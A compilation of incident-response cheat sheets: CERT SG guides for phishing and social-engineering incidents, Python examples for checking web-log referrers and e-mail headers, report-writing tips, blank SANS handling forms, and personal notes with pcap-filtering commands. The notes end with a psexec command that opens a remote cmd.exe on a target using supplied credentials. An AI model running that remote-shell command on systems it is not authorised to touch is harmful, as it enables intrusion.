- Recovery: recover to a normal stage
- Aftermath: draw up and improve the process

IRM provides detailed information for each step.

This document is for public use.

Remediation (step 4)

Objective: Take actions to stop the Denial of Service condition.

Contact your ISP and make sure that it enforces remediation measures. For information, here are some of the possible measures:

- Filtering (if possible at Tier 1 or Tier 2 level)
- Traffic-scrubbing/Sinkhole/Clean-pipe
- Blackhole routing

If the DDoS sponsors have been identified, consider involving law enforcement. This should be performed upon the direction of your company's executive and legal teams.

Technical remediation actions can mostly be enforced by your ISP.

Recovery (step 5)

Objective: Come back to the previous functional state.

Assess the end of the DDoS condition

Ensure that the impacted services are reachable again.

Ensure that your infrastructure performance is back to your baseline performance.

Rollback the mitigation measures

Switch back traffic to your original network.

Restart stopped services.

Ensure that the recovery-related actions are decided in accordance with the network teams. Bringing up services could have unexpected side effects.

Aftermath (step 6)

Objective: Document the incident's details, discuss lessons learned, and adjust plans and defences.

Consider what preparation steps you could have taken to respond to the incident faster or more effectively.

If necessary, adjust assumptions that affected the decisions made during DDoS incident preparation.

Assess the effectiveness of your DDoS response process, involving people and communications.

Consider what relationships inside and outside your organization could help you with future incidents.

Collaborate with legal teams if a legal action is in process.

IRM #13: Phishing incident response (Preparation, Identification, Containment)

Preparation (step 1)

Objective: Establish contacts, define procedures, and gather information to save time during an attack.

Create a list of all legitimate domains belonging to your company. This will help in analysing the situation, and prevent you from starting a takedown procedure on a forgotten legitimate website.

Prepare one web page hosted on your infrastructure, ready to be published anytime, to warn your customers about an ongoing phishing attack. Prepare and test a clear deployment procedure as well.

Prepare takedown e-mail forms. You will use them for every phishing case, if possible in several languages. This will speed things up when trying to reach the hosting company etc. during the takedown process.

Internal contacts

Maintain a list of all people involved in domain name registration in the company.

Maintain a list of all people accredited to take decisions on cybercrime and eventual actions regarding phishing. If possible, have a contract mentioning you can take decisions.

External contacts

Have several ways to be reached in a timely manner (24/7 if possible):

- E-Mail address, easy to remember for everyone (ex: security@yourcompany)
- Web forms on your company's website (the location of the form is important: no more than 2 clicks away from the main page)
- Visible Twitter account

Establish and maintain a list of takedown contacts in:

- Hosting companies
- Registry companies
- E-Mail providers

Establish and maintain contacts in CERTs worldwide; they will probably always be able to help if needed.

Raise customer awareness

Don't wait for phishing incidents to communicate with your customers. Raise awareness about phishing fraud, explain what phishing is and make sure your customers know you won't ever ask them for credentials/banking information by e-mail or on the phone.

Raise business line awareness

People in business lines must be aware of phishing problems and consider security as a priority. Therefore, they should apply good practices such as avoiding sending links (URLs) to customers, and using a signature stating that the company will never ask them for credential/banking information online.

Identification (step 2)

Objective: Detect the incident, determine its scope, and involve the appropriate parties.

Phishing detection

Monitor all your points of contact closely (e-mail, web forms, etc.).

Deploy spam traps and try to gather spam from partners/third parties.

Deploy active monitoring of phishing repositories, like AA419 or PhishTank for example.

Monitor any specialised mailing list you can have access to, or any RSS/Twitter feed, which could be reporting phishing cases.

Use automated monitoring systems on all of these sources, so that every detection triggers an alarm for instant reaction.

Monitor your web logs. Check there is no suspicious referrer bringing people to your website. This is often the case when the phishing website brings the user to the legitimate website after he's been cheated.

Involve appropriate parties

As soon as a phishing website is detected, contact the people in your company who are accredited to take a decision, if not you.

The decision to act on the fraudulent website/e-mail address must be taken as soon as possible, within minutes.

Collect evidence

Make a time-stamped copy of the phishing web pages. Use an efficient tool to do that, like HTTrack for example. Don't forget to take every page of the phishing scheme, not just the first one if there are several.

If needed, take screenshots of the pages.

Containment (step 3)

Objective: Mitigate the attack's effects on the targeted environment.

Spread the URL of the attack in case of a phishing website

Use every way you have to spread the fraudulent URL on every web browser: use the options of Internet Explorer, Chrome, Safari, Firefox, Netcraft toolbar, Phishing-Initiative, etc. This will prevent the users from accessing the website while you work on the remediation phase.

Spread the fraudulent e-mail content on spam-reporting websites/partners.

Communicate with your customers

Deploy the alert/warning page with information about the current phishing attack.

In case you are impacted several times a week, don't always deploy an alert/warning message but rather a very informative phishing page to raise awareness.

Check the source code of the phishing website

- See where the data is exported: either to another web content you cannot access (a PHP script usually), or sent by e-mail to the fraudster.
- Watch how the phishing page is built. Do the graphics come from one of your legitimate websites, or are they stored locally?

If possible, in case the graphics are taken from one of your own websites, you could change the graphics to display a "PHISHING WEBSITE" logo on the fraudster's page.
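The Identification step above says to watch web logs for suspicious referrers, because a phishing page often forwards the victim to the legitimate site afterwards, and the Preparation step asks for a list of the company's legitimate domains. The Python script below is an added example rather than the sheet's own tooling: it parses constructed Apache combined-format log lines, extracts the referrer host, and reports every referrer that is neither one of the legitimate domains nor a known-good site such as a search engine. The sample log lines, the examplebank.test domain and the known-good list are assumptions made for this example.

```python
"""
Added example: flag web-log referrers that are not one of the company's
legitimate domains. Log lines and domains are constructed for this example.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: two victims forwarded from a look-alike domain, one
# phishing page hot-linking the bank's logo, plus ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:09:12:01 +0000] "GET /login HTTP/1.1" 200 5120 "https://www.examplebank.test/" "Mozilla/5.0"
203.0.113.8 - - [10/Mar/2024:09:12:09 +0000] "GET /login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2024:09:13:44 +0000] "GET /account/confirmation HTTP/1.1" 200 2210 "http://examplebank-secure-login.test/verify.php" "Mozilla/5.0"
198.51.100.24 - - [10/Mar/2024:09:14:02 +0000] "GET /account/confirmation HTTP/1.1" 200 2210 "http://examplebank-secure-login.test/verify.php" "Mozilla/5.0"
198.51.100.31 - - [10/Mar/2024:09:15:17 +0000] "GET /login HTTP/1.1" 200 5120 "https://www.google.com/" "Mozilla/5.0"
198.51.100.40 - - [10/Mar/2024:09:16:40 +0000] "GET /img/logo.png HTTP/1.1" 200 8800 "http://203.0.113.99/~tmp/bank/index.html" "Mozilla/5.0"
"""

LEGITIMATE_DOMAINS = ["examplebank.test"]   # assumed: the Preparation-step domain list
KNOWN_GOOD = ["google.com"]                 # assumed: referrers you expect (search engines)


def parse_combined(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def referrer_host(referer):
    """Lower-cased host of the Referer value; None for direct hits ('-') or junk."""
    if not referer or referer == "-":
        return None
    host = urlsplit(referer).hostname
    return host.lower() if host else None


def is_legitimate(host, domains):
    """True if host is one of the domains or a subdomain of one (suffix match on
    a dot boundary, so examplebank-secure-login.test does not pass)."""
    return any(host == d or host.endswith("." + d) for d in domains)


def suspicious_referrers(lines, legitimate_domains, known_good=()):
    """Map each external referrer host to its hit count and the landing paths."""
    allowed = set(legitimate_domains) | set(known_good)
    hits = Counter()
    paths = defaultdict(set)
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue                       # skip unparseable lines, do not crash the sweep
        host = referrer_host(rec["referer"])
        if host is None or is_legitimate(host, allowed):
            continue
        hits[host] += 1
        paths[host].add(rec["path"])
    return {h: {"hits": n, "paths": sorted(paths[h])} for h, n in hits.most_common()}


if __name__ == "__main__":
    report = suspicious_referrers(SAMPLE_LOG.splitlines(), LEGITIMATE_DOMAINS, KNOWN_GOOD)
    for host, info in report.items():
        print(f"{host}: {info['hits']} hit(s) landing on {', '.join(info['paths'])}")
```

The look-alike examplebank-secure-login.test fails the dot-boundary suffix check and is reported with the landing page it forwards victims to; so is the address hosting a page that hot-links /img/logo.png, which is the situation the Containment step describes where the fraudster's page pulls graphics from your own site. The output is an investigation lead (host, hit count, landing paths) to hand to the people accredited to decide on a takedown, not a verdict.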

IRM #13: Phishing incident response (Remediation, Recovery, Aftermath)

Incident Response Methodology IRM #13
Phishing incident response
Guidelines to handle phishing incidents

IRM Author: CERT SG / Cedric PERNET
IRM version: 1.0
E-Mail: cert.sg@socgen.com
Web: http://cert.societegenerale.com
Twitter: @CertSG

Remediation (step 4)

Objective: Take actions to stop the fraud.

In case the fraudulent phishing pages are hosted on a compromised website, try to contact the owner of the website. Explain the fraud clearly to the owner, so that he takes appropriate actions: remove the fraudulent content, and most of all upgrade the security on it, so that the fraudster cannot come back using the same vulnerability.

In any case, also contact the hosting company of the website. Send e-mails to the contact addresses of the hosting company (generally there is an abuse@hostingcompany address), then try to get someone on the phone, to speed things up.

Contact the e-mail hosting company to shut down the fraudulent accounts which receive the stolen credentials or credit card information (either on an "e-mail only" phishing case or on a usual one, if you managed to get the destination e-mail address).

In case there is a redirection (the link contained in the e-mail often goes to a redirecting URL), also take down the redirection by contacting the company responsible for the service.

In case you get no answer, or no action is taken, don't hesitate to call back and send e-mails on a regular basis, every two hours for example.

If the takedown is too slow, contact a local CERT in the involved country, which could help taking down the fraud.

Recovery (step 5)

Objective: Come back to the previous functional state.

Assess the end of the phishing case

Ensure that the fraudulent pages and/or e-mail address are down.

Keep monitoring the fraudulent URL. Sometimes a phishing website can reappear some hours later. In case a redirection is used and not taken down, monitor it very closely.

At the end of a phishing campaign, remove the associated warning page from your website.

Aftermath (step 6)

Objective: Document the incident's details, discuss lessons learned, and adjust plans and defences.

Consider what preparation steps you could have taken to respond to the incident faster or more efficiently.

Update your contact lists and add notes as to what is the most effective way to contact each involved party.

Consider what relationships inside and outside your organization could help you with future incidents.

Collaborate with legal teams if a legal action is required.

IRM #10: Social Engineering Incident (Preparation, Identification, Containment)

Preparation (step 1)

Objective: Establish contacts, define procedures, and gather information to save time during an incident.

Raise user awareness and security policies

- Never give any personal or corporate information to an unidentified person. This could include user IDs, passwords, account information, name, e-mail address, phone (mobile or landline) numbers, address, social security number, job titles, information on clients, organization or IT systems. The goal of the social engineer is to steal human resources, corporate secrets or customer/user data.
- Report any suspicious event to your manager, who will forward it to the CISO in order to have centralized reporting.
- Have a defined process to redirect any "weird" request to a "red" phone, if needed. The red phone number must be clearly tagged as "Social Engineering". The phone number has to be easy to identify in the global phone directory of your company, but requests on the reverse number should not be displayed. The red phone line should always be recorded for evidence collecting purposes.
- Prepare to handle conversations with social engineers to identify which information could help in tracking the attacker and his goals.
- Check with your legal department to see which actions are allowed and which reactions they can handle.

Identification (step 2)

Objective: Detect the incident, determine its scope, and involve the appropriate parties.

Phone call: someone you don't know calls you/your service, asking for detailed information.

If the contact works outside the company and requests information that could be valuable for a competitor, deny his requests and go to part 3.

If the contact pretends to be an employee of your company but the phone number is hidden or not internal, propose that you call back to the declared number in the directory. If the supposed attacker agrees, call back to check. If he rejects this option, go to part 3.

The attacker might use several techniques to entice his victim to speak (fear, curiosity, empathy...). Do not disclose information in any case.

Listen carefully to his requests and at the end ask for a phone number to call back or an e-mail address to reply to.

Take notes and stay calm, even if the attacker is shouting or threatening; remember he tries to use human weaknesses.

If you can go further, the following information will be precious:

- the name of the correspondent,
- requested information / people,
- accent, language skills,
- industry language and organizational knowledge,
- background noises,
- time and duration of the call.

E-mail: someone you don't know requests detailed information.

If the contact has an "out of the company" e-mail address and requests information that could be valuable for a competitor, go to part 3.

If the contact uses an internal e-mail address but is asking for weird information, ask him for some explanations and use the company directory to get his manager's name, whom you'll place in copy.

Eventually notify top management to inform them that an incident has been encountered relating to a social engineering attack. They might understand the goals depending on the context.

Containment (step 3)

Objective: Mitigate the attack's effects on the targeted environment.

At this step, you should be pretty sure that you're dealing with a social engineering attack.

Actions for all employees:

Phone call

If the attacker urges you to give a phone number, follow these steps:

- Use the "red phone line" from your CERT/CSIRT, if existing.
- Give him the number with an invented name.
- Immediately call your CERT/CSIRT team explaining what happened and the chosen invented name.
- If the attacker stresses you too much and does not leave you time to find the red phone number, ask him to call you back later, pretending a meeting.

If the attacker wants to reach someone, follow these points:

- Place the attacker on hold, call the CERT/CSIRT team and explain what happened.
- Transfer the attacker's conversation to the CERT/CSIRT team (do not give him the number).

E-mail

Forward to your security team all e-mails including headers (send as attached documents) for investigation purposes. It might help to track the attacker.

Incident Response Methodology

IRM #10

Social Engineering Incident

How to handle a social engineering incident (phone or e-mail)

IRM Author: CERT SG Team

IRM version: 1.0

E-Mail: cert.sg@socgen.com

Web: http://cert.societegenerale.com

Twitter: @CertSG

Abstract

This Incident Response Methodology is a cheat sheet dedicated to handlers investigating a precise security issue.

Who should use IRM sheets? Administrators • Security Operation Center • CISOs and deputies • CERTs (Computer Emergency Response Team)

Remember: If you face an incident, follow IRM, take notes and do not panic. Contact your CERT immediately if needed.

Incident handling steps

6 steps are defined to handle security incidents:

Preparation: get ready to handle the incident

Identification: detect the incident

Containment: limit the impact of the incident

Remediation: remove the threat

Recovery: recover to a normal stage

Aftermath: draw up and improve the process

IRM provides detailed information for each step.

This document is for public use.

Containment

Actions for CERT or incident response team:

■■ Phone call

Resume the conversation with the attacker and use one of these techniques:

Impersonate the person the attacker is asking to speak to.

Slow down, make the conversation last, and entice the attacker into making mistakes.

Explain to him that social engineering attacks are forbidden by law and punished by sanctions, and that the legal team will handle the issue if it continues.

If the trap phone number has been used, prepare to "burn it": create another one and display it in the directory.

■■ E-mail

Collect as much information as possible on the email address:

Analyze the email headers and try to locate the source.

Search the e-mail address with Internet tools.

Geolocalize the user behind the email address.

■■ Aggregate all social engineering attacks to visualize the scheme.

Remediation

Objective: Take actions to remove the threat and avoid future incidents.

Some possible remediation actions can be tried:

■■ Alert law enforcement and/or file a complaint,

■■ Discuss the problem in circles of trust to know if the company is facing this issue alone,

■■ Threaten the attacker with legal action if he can be identified.

Recovery

Objective: Restore the system to normal operations.

Notify top management of the actions and the decisions taken on the social engineering case.

Aftermath

Objective: Document the incident's details, discuss lessons learned, and adjust plans and defences.

Inform your hierarchy and subsidiaries about the incident; this could help to avoid similar attacks later.

Report

An incident report should be written and made available to all the actors of the incident. The following themes should be described:

■■ Initial detection

■■ Actions and timelines

■■ What went right

■■ What went wrong

■■ Incident cost (direct and indirect losses)

Capitalize

Actions to improve the social engineering handling processes should be defined to capitalize on this experience, especially awareness.
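For the E-mail actions above ("Analyze the email headers and try to locate the source"), here is an added example, not part of the IRM sheet, that walks the Received: chain of a constructed message top-down and separates the hop our own MTA actually saw from what the sender's side merely claims; the message, host names, addresses and the trusted-MTA list are assumptions.

```python
"""Walk the Received: chain of a suspect e-mail to find the host that
actually delivered it to us (IRM #10, E-mail: analyze the headers and
try to locate the source). Added example, not part of the IRM sheet;
the message, hosts, addresses and trusted-MTA list are constructed."""
import email
import re
from email import policy

# Constructed sample message: an external relay hands a spoofed invoice
# mail to our perimeter MTA mx1, which forwards it to the internal store.
RAW_MESSAGE = """\
Return-Path: <billing@examp1e-corp.invalid>
Received: from mx1.corp.example (mx1.corp.example [192.0.2.10])
\tby mail.corp.example with ESMTP id 7Fa3; Tue, 2 May 2023 10:15:22 +0000
Received: from relay.bulk-sender.invalid (relay.bulk-sender.invalid [203.0.113.45])
\tby mx1.corp.example with ESMTPS id 9Bc1; Tue, 2 May 2023 10:15:21 +0000
Received: from USER-PC (unknown [198.51.100.77])
\tby relay.bulk-sender.invalid with ESMTPA; Tue, 2 May 2023 10:15:20 +0000
From: "Accounts Payable" <ap@corp.example>
To: finance@corp.example
Subject: Urgent wire transfer

Please process the attached invoice today.
"""

# Hosts whose Received: lines we wrote ourselves and therefore trust (assumed).
TRUSTED_MTAS = {"mail.corp.example", "mx1.corp.example"}

# "from <helo> (<rdns> [<ip>]) ... by <host>"; the parenthesised part is
# optional because some MTAs omit it.
HOP_RE = re.compile(
    r"^from\s+(?P<helo>\S+)"
    r"(?:\s+\((?P<rdns>[^\s\[\]]*)\s*\[(?P<ip>[^\]]+)\]\))?"
    r".*?\bby\s+(?P<by>\S+)",
    re.DOTALL,
)


def _domain(addr):
    """Domain part of an address header, lower-cased ('' if none)."""
    m = re.search(r"@([\w.-]+)", str(addr or ""))
    return m.group(1).lower() if m else ""


def parse_hops(raw):
    """Return (hops, msg); hops[0] is the line added last, i.e. nearest to us."""
    msg = email.message_from_string(raw, policy=policy.default)
    hops = []
    for value in msg.get_all("Received", []):
        m = HOP_RE.match(" ".join(str(value).split()))  # unfold, collapse spaces
        if m:
            hops.append({"helo": m["helo"], "rdns": m["rdns"] or "",
                         "ip": m["ip"] or "", "by": m["by"]})
    return hops, msg


def locate_source(raw, trusted=TRUSTED_MTAS):
    """Separate what we verified (the peer our own MTAs saw connect) from what
    the sender's side claims: every Received: line below ours can be forged."""
    hops, msg = parse_hops(raw)
    verified = None
    for hop in hops:            # top-down: stop at the first line we did not write
        if hop["by"] not in trusted:
            break
        verified = hop          # the 'from' of this line is what our MTA observed
    claimed = hops[-1] if hops else None
    return {
        "hops": hops,
        "verified_source_ip": verified["ip"] if verified else None,
        "verified_source_host": (verified["rdns"] or verified["helo"]) if verified else None,
        "claimed_origin_ip": claimed["ip"] if claimed else None,
        "return_path_mismatch": _domain(msg.get("Return-Path")) != _domain(msg.get("From")),
    }


if __name__ == "__main__":
    result = locate_source(RAW_MESSAGE)
    for hop in result["hops"]:
        print(f"{hop['by']:<28} received from {hop['helo']} [{hop['ip']}]")
    print("verified handoff from :", result["verified_source_host"], result["verified_source_ip"])
    print("claimed origin        :", result["claimed_origin_ip"], "(unverifiable)")
    print("Return-Path != From   :", result["return_path_mismatch"])
```

The verified handoff (203.0.113.45 here) is the address worth reporting to the relay's abuse contact; the bottom-most hop is only the sender's own story.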


TIPS FOR CREATING AN INFORMATION SECURITY ASSESSMENT REPORT

This cheat sheet presents recommendations for creating a strong report as part of an information security assessment project.

General Approach to Creating the Report

1. Analyze the data collected during the security assessment to identify relevant issues.

2. Prioritize your risks and observations; formulate remediation steps.

3. Document the sections of the report detailing the assessment methodology and scope.

4. Document the sections of the report describing your findings and recommendations.

5. Attach relevant figures and raw data to support the main body of the report.

6. Create the executive summary to highlight the key findings and recommendations.

7. Proof-read and edit the document.

8. Consider submitting the report's draft to weed out false positives and confirm expectations.

9. Submit the final report to the intended recipient using an agreed-upon secure transfer mechanism.

10. Discuss the report's contents with the recipient on the phone or in person.

Analysis of the Security Assessment Data

Your analysis should provide value beyond regurgitating the data already in existence.

Consider what information provided to you is incomplete or might be a lie or half-truth.

Group initial findings based on affected resources, risk, issue category, etc. to look for patterns.

Identify trends that highlight the existence of underlying problems that affect security.

If examining scanner output, consider exploring the data using spreadsheets and pivot tables.

Fill in the gaps in your understanding with follow-up scans, document requests and/or interviews.

Involve colleagues in your analysis to obtain other people's perspectives on the data and conclusions.

Assessment Methodology Documentation

Document the methodology used to perform the assessment, analyze data and prioritize findings.

The methodology's description needs to demonstrate a systemic and well-reasoned assessment approach.

Clarify the type of the assessment performed: penetration test, vulnerability assessment, etc.

If applicable, explain what security assessment tools were used and how they were configured.

If applicable, describe what approach guided the questions you asked during interviews.

Describe the criteria used to assign severity or criticality levels to the findings of the assessment.

Refer to the relevant frameworks you used to guide the assessment efforts (PCI DSS, ISO 27001, etc.).

Scope of the Security Assessment

Specify what systems, networks and/or applications were reviewed as part of the security assessment.

State what documentation was reviewed, if any.

List the people whom you interviewed, if any.

Clarify the primary goals of the assessment project.

Discuss what contractual obligations or regulatory requirements were accounted for in the assessment.

Document any items that were specifically excluded from the assessment's scope and explain why.

Documenting Conclusions

Include both negative and positive findings.

Account for the organization's industry, business model and compliance requirements where appropriate.

Stay consistent with the methodology and scope.

Prioritize findings related to security risks.

Provide a practical remediation path, accounting for the organization's strengths and weaknesses.

Qualities of a Good Assessment Report

Starts with a strong executive summary that a non-technical reader can understand

Provides meaningful analysis, rather than merely presenting the output of assessment tools

Includes supporting figures to support the analysis

Describes assessment methodology and scope

Looks professional and is without typos

Offers remediation guidance beyond merely pointing out security problems

Is structured in logical sections to accommodate the different groups who'll read and act upon it

Additional Assessment Report Tips

Create templates based on prior reports, so you don't have to write every document from scratch.

Safeguard (encrypt) the report when storing and sending it, since its contents are probably sensitive.

Use concrete statements; avoid passive voice.

Explain the significance of the security findings in the context of current threats and events.

Put effort into making the report as brief as possible without omitting important and relevant contents.

More Security Assessment Tips

6 Qualities of a Good Information Security Report: http://j.mp/m3AK9r

4 Tips for a Strong Executive Summary of a Security Assessment Report: http://j.mp/jsT669

Security Assessment Report as Critique, Not Criticism: http://j.mp/m6e6p0

4 Reasons Why Security Assessment Recommendations Get Ignored: http://j.mp/irFHRa

Dealing with Misinformation During Security Assessments: http://j.mp/jv8jxz

Authored by Lenny Zeltser, who writes a daily security blog at blog.zeltser.com; you can also find him on Twitter as @lennyzeltser. This cheat sheet was reviewed by Dave Shackleford and John Strand. It's distributed according to the Creative Commons 3 Attribution License. You're looking at version 1.0 of this document. For more security cheat sheets see http://j.mp/mrGgHJ.


© SANS Institute 2003 All Rights Reserved


COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __

INCIDENT COMMUNICATION LOG DATE UPDATED:_____________

Date:______________ Time:_________ • am • pm Method (mail, phone, email, etc.):________________

Initiator Name:________________________________ Receiver Name:________________________________

Initiator Title: _________________________________ Receiver Title: _________________________________

Initiator Organization: __________________________ Receiver Organization:___________________________

Initiator Contact Info:___________________________ Receiver Contact Info: ___________________________

Details:_______________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Date:______________ Time:_________ • am • pm Method (mail, phone, email, etc.):________________

Initiator Name:________________________________ Receiver Name:________________________________

Initiator Title: _________________________________ Receiver Title: _________________________________

Initiator Organization: __________________________ Receiver Organization:___________________________

Initiator Contact Info:___________________________ Receiver Contact Info: ___________________________

Details:_______________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Date:______________ Time:_________ • am • pm Method (mail, phone, email, etc.):________________

Initiator Name:________________________________ Receiver Name:________________________________

Initiator Title: _________________________________ Receiver Title: _________________________________

Initiator Organization: __________________________ Receiver Organization:___________________________

Initiator Contact Info:___________________________ Receiver Contact Info: ___________________________

Details:_______________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Prepared By: Greg Jones


COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __

INCIDENT CONTACT LIST DATE UPDATED:_____________

Corporate Security Officer: Corporate Incident Handling, CIRT, or FIRST Team:

Name:_______________________________________ Name:_______________________________________

Title: ________________________________________ Title: ________________________________________

Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________

Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________

Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

E-mail: ______________________________________ E-mail: ______________________________________

Address: _____________________________________ Address: _____________________________________

_____________________________________________ _____________________________________________

Corporate Legal Affairs Officer: CIO or Information Systems Security Manager:

Name:_______________________________________ Name:_______________________________________

Title: ________________________________________ Title: ________________________________________

Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________

Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________

Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

E-mail: ______________________________________ E-mail: ______________________________________

Address: _____________________________________ Address: _____________________________________

_____________________________________________ _____________________________________________

Corporate Public Affairs Officer: Other (Specify):__________________________

Name:_______________________________________ Name:_______________________________________

Title: ________________________________________ Title: ________________________________________

Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________

Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________

Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

E-mail: ______________________________________ E-mail: ______________________________________

Address: _____________________________________ Address: _____________________________________

_____________________________________________ _____________________________________________

Prepared By: Greg Jones


COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __

INCIDENT CONTACT LIST DATE UPDATED:_____________

Local Contacts

Internet Service Provider Technical Contact: Local FBI or Equivalent Agency:

Name:_______________________________________ Name:_______________________________________

Title: ________________________________________ Title: ________________________________________

Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________

Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________

Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

E-mail: ______________________________________ E-mail: ______________________________________

Address: _____________________________________ Address: _____________________________________

_____________________________________________ _____________________________________________

Local Law Enforcement Computer Crime: Local CIRT or FIRST Team:

Name:_______________________________________ Name:_______________________________________

Title: ________________________________________ Title: ________________________________________

Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________

Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________

Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

E-mail: ______________________________________ E-mail: ______________________________________

Address: _____________________________________ Address: _____________________________________

_____________________________________________ _____________________________________________

Other (Specify):__________________________ Other (Specify):__________________________

Name:_______________________________________ Name:_______________________________________

Title: ________________________________________ Title: ________________________________________

Phone:______________ Alt. Phone: ______________ Phone:______________ Alt. Phone: ______________

Mobile: ______________ Pager:__________________ Mobile: ______________ Pager:__________________

Fax:_________________ Alt. Fax:_________________ Fax:_________________ Alt. Fax:_________________

E-mail: ______________________________________ E-mail: ______________________________________

Address: _____________________________________ Address: _____________________________________

_____________________________________________ _____________________________________________

Prepared By: Greg Jones


COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __

INCIDENT IDENTIFICATION DATE UPDATED:_____________

General Information

Incident Detector’s Information:

Name:_______________________________________ Date and Time Detected: ________________________

Title: ________________________________________

Phone:______________ Alt. Phone: ______________ Location Incident Detected From: __________________

Mobile: ______________ Pager:__________________ _____________________________________________

Fax:_________________ Alt. Fax:_________________ Additional Information:___________________________

E-mail: ______________________________________ _____________________________________________

Address: _____________________________________ _____________________________________________

_____________________________________________ _____________________________________________

Detector’s Signature:____________________________ Date Signed: __________________________________

Incident Summary

Type of Incident Detected:

• Denial of Service • Unauthorized Use • Espionage • Probe • Hoax

• Malicious Code • Unauthorized Access • Other:____________________________________

Incident Location:

Site:_________________________________________ How was the Incident Detected:____________________

Site Point of Contact:____________________________ _____________________________________________

Phone:______________ Alt. Phone: ______________ _____________________________________________

Mobile: ______________ Pager:__________________ _____________________________________________

Fax:_________________ Alt. Fax:_________________ _____________________________________________

E-mail: ______________________________________ _____________________________________________

Address: _____________________________________ _____________________________________________

_____________________________________________ _____________________________________________

Additional Information: ______________________________________________________________________________

________________________________________________________________________________________________

________________________________________________________________________________________________

Prepared By: Greg Jones


COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __

INCIDENT CONTAINMENT DATE UPDATED:_____________

Isolate affected systems:

Command Decision Team approved removal from network? • YES • NO

If YES, date and time systems were removed: ________________________________________________________

If NO, state the reason: __________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Backup affected systems:

System backup successful for all systems? • YES • NO

Name of persons who did backup:__________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Date and time backups started:____________________________________________________________________

Date and time backups complete: __________________________________________________________________

Backup tapes sealed? • YES • NO Seal Date: ________________________

Backup tapes turned over to:______________________________________________________________________

Signature:_______________________________________________________ Date: ________________________

Backup Storage Location: ________________________________________________________________________

Prepared By: Greg Jones


COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __

INCIDENT ERADICATION DATE UPDATED:_____________

Name of persons performing forensics on systems: ________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Was the vulnerability identified? • YES • NO

Describe: _____________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

What was the validation procedure used to ensure problem was eradicated: ____________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Prepared By: Greg Jones


COMPUTER SECURITY INCIDENT HANDLING FORMS PAGE __ OF __

INCIDENT SURVEY DATE UPDATED:_____________


Location(s) of affected systems: _____________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Date and time incident handlers arrived at site: ________________________________________________

_____________________________________________________________________________________________

_____________________________________________________________________________________________

Describe affected information system(s) (one form per system is recommended):

Hardware Manufacturer:__________________________________________________________________________

Serial Number: _________________________________________________________________________________

Corporate Property Number (if applicable): ___________________________________________________________

Is the affected system connected to a network? • YES • NO

System Name: _________________________________________________________________________________

System Network Address:_________________________________________________________________________

MAC Address: _________________________________________________________________________________

Is the affected system connected to a modem? • YES • NO

Phone Number: __________________________________________________________________________________

Describe the physical security of the location of affected information systems (locks, security alarms, building access, etcetera): _______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

_______________________________________________________________________________________________

Prepared By: Greg Jones


Notes:

These are just miscellaneous notes I use frequently.

Searching through multiple pcaps at once (run this in the directory holding the captures; "host 192.168.1.1" is the BPF filter, change it to whatever traffic you want):

for i in *; do ngrep -W byline -O "/desired/output/directory/traffic$i.pcap" -qI "$i" host 192.168.1.1; done

cd /desired/output/directory

mergecap -w desiredname.pcap traffic*.pcap

You now have a single pcap containing only the traffic that matched the BPF filter you gave the first command.

Windows psexec remote cmd prompt:

First download Sysinternals (PsTools) from Microsoft and, from a command prompt, navigate to the folder containing it:

psexec.exe \\targetIP -u username -p password cmd.exe

